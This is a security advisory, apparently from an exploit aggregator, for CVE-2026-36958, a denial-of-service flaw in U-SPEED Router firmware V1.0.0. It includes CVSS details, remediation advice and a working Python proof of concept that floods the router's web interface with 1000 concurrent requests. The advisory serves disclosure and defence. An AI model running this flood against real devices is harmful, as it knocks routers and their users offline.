Share
## https://sploitus.com/exploit?id=47F13C16-649D-5FFC-8499-B7894921782F
# CVE-2026-36958: Denial of Service via Concurrent HTTP Requests

**CVE ID:** CVE-2026-36958
**Date:** 2026-04-29
**Discoverer:** Kirubel Solomne
**Vendor:** U-SPEED
**Product:** U-SPEED Router
**Firmware Version:** V1.0.0
**CWE:** CWE-400 - Uncontrolled Resource Consumption

---

## Description

The U-SPEED Router firmware V1.0.0 is vulnerable to Denial of Service. By sending a large number of concurrent HTTP requests to random or non-existent endpoints on the web management interface, an attacker can exhaust system resources in the embedded Boa HTTP server. This causes the router web interface to become unresponsive and may require a manual reboot to restore normal operation.

---

## CVSS Score

**CVSS v3.1 Score: 7.5 (High)**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Confidentiality Impact | None |
| Integrity Impact | None |
| Availability Impact | High |

---

## Proof of Concept

```python
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")
```

**Expected Behavior:** Server should handle concurrent connections gracefully.
**Actual Behavior:** Web interface becomes unresponsive; manual reboot required.

---

## Impact

- Web management interface becomes unavailable
- Potential disruption of routing services
- Requires manual reboot to restore functionality

---

## Remediation

- Implement connection rate limiting on the Boa web server
- Limit maximum concurrent connections per source IP
- Add automatic recovery/watchdog mechanism

---

## Disclosure Timeline

| Date | Event |
|---|---|
| 2026-04-29 | Vulnerability discovered |
| 2026-04-29 | Reported to MITRE |
| 2026-04-29 | CVE-2026-36958 assigned |
| 2026-04-29 | Public disclosure |

---

## References

- [MITRE CVE-2026-36958](https://vulners.com/cve/CVE-2026-36958)
- [CWE-400](https://cwe.mitre.org/data/definitions/400.html)
- [Vendor Website](http://u-speed.com)